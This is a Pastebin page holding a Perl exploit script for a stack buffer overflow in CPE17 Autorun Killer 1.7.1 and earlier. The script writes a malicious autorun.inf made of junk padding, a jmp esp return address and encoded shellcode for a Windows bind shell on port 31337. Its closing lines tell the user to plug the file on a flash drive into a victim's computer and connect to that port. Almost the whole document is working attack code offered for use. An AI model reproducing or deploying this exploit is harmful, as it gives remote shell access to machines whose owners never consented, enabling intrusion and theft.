Advertisement
Xenithz

CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit

Apr 26th, 2012
470
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 3.91 KB | None | 0 0
  1. # CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit
  2. # Payload : Windows Bind TCP with port 31337
  3. # Exploit by : Xelenonz :D
  4. # Site : Xelenonz.blogspot.com
  5. # test with Windows XP SP 3
  6. # founded by : Trackerx90
  7. # Thanks Trackerx90 for idea
  8. # PoC : http://www.uppic.org/image-5B58_4F996E59.jpg
  9.  
  10. my $file= "/Users/xenithz/autorun.inf";
  11. my $buffersize = 500;
  12. my $eip = pack('V',0x775a676f);  # jmp esp
  13.  
  14. my $junk = "A" x 500;
  15. my $esp = "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
  16. "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" .
  17. "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" .
  18. "\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x69\x78" .
  19. "\x6c\x49\x73\x30\x35\x50\x43\x30\x73\x50\x4f\x79\x4b\x55" .
  20. "\x44\x71\x38\x52\x43\x54\x4e\x6b\x33\x62\x46\x50\x4e\x6b" .
  21. "\x63\x62\x34\x4c\x6c\x4b\x62\x72\x66\x74\x6e\x6b\x43\x42" .
  22. "\x74\x68\x44\x4f\x58\x37\x43\x7a\x51\x36\x46\x51\x69\x6f" .
  23. "\x35\x61\x6f\x30\x6c\x6c\x47\x4c\x61\x71\x61\x6c\x75\x52" .
  24. "\x44\x6c\x77\x50\x4f\x31\x5a\x6f\x66\x6d\x47\x71\x39\x57" .
  25. "\x6d\x32\x4a\x50\x62\x72\x56\x37\x4c\x4b\x42\x72\x46\x70" .
  26. "\x4e\x6b\x51\x52\x47\x4c\x53\x31\x48\x50\x6c\x4b\x51\x50" .
  27. "\x64\x38\x4c\x45\x4f\x30\x32\x54\x43\x7a\x36\x61\x38\x50" .
  28. "\x36\x30\x6e\x6b\x70\x48\x77\x68\x4e\x6b\x46\x38\x35\x70" .
  29. "\x47\x71\x4e\x33\x4b\x53\x55\x6c\x70\x49\x6e\x6b\x56\x54" .
  30. "\x4c\x4b\x65\x51\x4a\x76\x75\x61\x39\x6f\x46\x51\x6f\x30" .
  31. "\x6c\x6c\x4a\x61\x6a\x6f\x54\x4d\x65\x51\x58\x47\x44\x78" .
  32. "\x4d\x30\x63\x45\x38\x74\x74\x43\x43\x4d\x38\x78\x45\x6b" .
  33. "\x43\x4d\x56\x44\x54\x35\x6b\x52\x56\x38\x4c\x4b\x52\x78" .
  34. "\x76\x44\x33\x31\x79\x43\x73\x56\x4e\x6b\x76\x6c\x42\x6b" .
  35. "\x6c\x4b\x42\x78\x57\x6c\x67\x71\x49\x43\x4c\x4b\x47\x74" .
  36. "\x6e\x6b\x76\x61\x5a\x70\x4e\x69\x30\x44\x57\x54\x71\x34" .
  37. "\x31\x4b\x51\x4b\x43\x51\x36\x39\x62\x7a\x66\x31\x49\x6f" .
  38. "\x6d\x30\x56\x38\x43\x6f\x53\x6a\x4e\x6b\x45\x42\x5a\x4b" .
  39. "\x6d\x56\x71\x4d\x73\x58\x66\x53\x74\x72\x73\x30\x73\x30" .
  40. "\x31\x78\x70\x77\x33\x43\x57\x42\x43\x6f\x76\x34\x70\x68" .
  41. "\x32\x6c\x50\x77\x74\x66\x54\x47\x69\x6f\x5a\x75\x58\x38" .
  42. "\x6e\x70\x47\x71\x67\x70\x55\x50\x55\x79\x59\x54\x31\x44" .
  43. "\x46\x30\x35\x38\x65\x79\x4b\x30\x52\x4b\x53\x30\x6b\x4f" .
  44. "\x59\x45\x72\x70\x70\x50\x70\x50\x56\x30\x71\x50\x66\x30" .
  45. "\x73\x70\x46\x30\x63\x58\x7a\x4a\x66\x6f\x4b\x6f\x59\x70" .
  46. "\x59\x6f\x5a\x75\x6f\x79\x78\x47\x30\x31\x69\x4b\x42\x73" .
  47. "\x73\x58\x76\x62\x33\x30\x71\x6a\x71\x79\x6d\x59\x7a\x46" .
  48. "\x61\x7a\x56\x70\x63\x66\x66\x37\x45\x38\x38\x42\x69\x4b" .
  49. "\x44\x77\x31\x77\x79\x6f\x38\x55\x72\x73\x33\x67\x72\x48" .
  50. "\x4c\x77\x39\x79\x36\x58\x69\x6f\x6b\x4f\x78\x55\x36\x33" .
  51. "\x56\x33\x32\x77\x65\x38\x74\x34\x5a\x4c\x77\x4b\x58\x61" .
  52. "\x69\x6f\x5a\x75\x32\x77\x4f\x79\x78\x47\x50\x68\x52\x55" .
  53. "\x52\x4e\x72\x6d\x63\x51\x4b\x4f\x69\x45\x52\x48\x55\x33" .
  54. "\x70\x6d\x55\x34\x67\x70\x4e\x69\x6b\x53\x31\x47\x51\x47" .
  55. "\x62\x77\x66\x51\x78\x76\x71\x7a\x52\x32\x30\x59\x52\x76" .
  56. "\x59\x72\x79\x6d\x51\x76\x39\x57\x70\x44\x66\x44\x35\x6c" .
  57. "\x57\x71\x53\x31\x6e\x6d\x77\x34\x56\x44\x34\x50\x49\x56" .
  58. "\x43\x30\x77\x34\x63\x64\x30\x50\x36\x36\x63\x66\x43\x66" .
  59. "\x61\x56\x43\x66\x70\x4e\x56\x36\x76\x36\x43\x63\x52\x76" .
  60. "\x33\x58\x51\x69\x4a\x6c\x35\x6f\x6c\x46\x6b\x4f\x5a\x75" .
  61. "\x6b\x39\x79\x70\x62\x6e\x72\x76\x63\x76\x69\x6f\x74\x70" .
  62. "\x51\x78\x45\x58\x6f\x77\x55\x4d\x71\x70\x79\x6f\x6b\x65" .
  63. "\x6d\x6b\x78\x70\x68\x35\x4e\x42\x66\x36\x32\x48\x6d\x76" .
  64. "\x4f\x65\x4d\x6d\x6f\x6d\x39\x6f\x48\x55\x35\x6c\x43\x36" .
  65. "\x43\x4c\x46\x6a\x4b\x30\x79\x6b\x79\x70\x30\x75\x36\x65" .
  66. "\x6f\x4b\x33\x77\x44\x53\x64\x32\x52\x4f\x63\x5a\x67\x70" .
  67. "\x30\x53\x69\x6f\x39\x45\x41\x41";
  68.  
  69. my $payload = $junk.$eip.$esp;
  70. open($FILE,">$file");
  71. print $FILE $payload;
  72. close($FILE);
  73. print "[+] Create file complete copy\n";
  74. print "[+] Output file : $file\n";
  75. print "[+] Copy to flashdrive and plug it at victim's computer\n";
  76. print "[+] Connect to host with port 31337!!\n";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement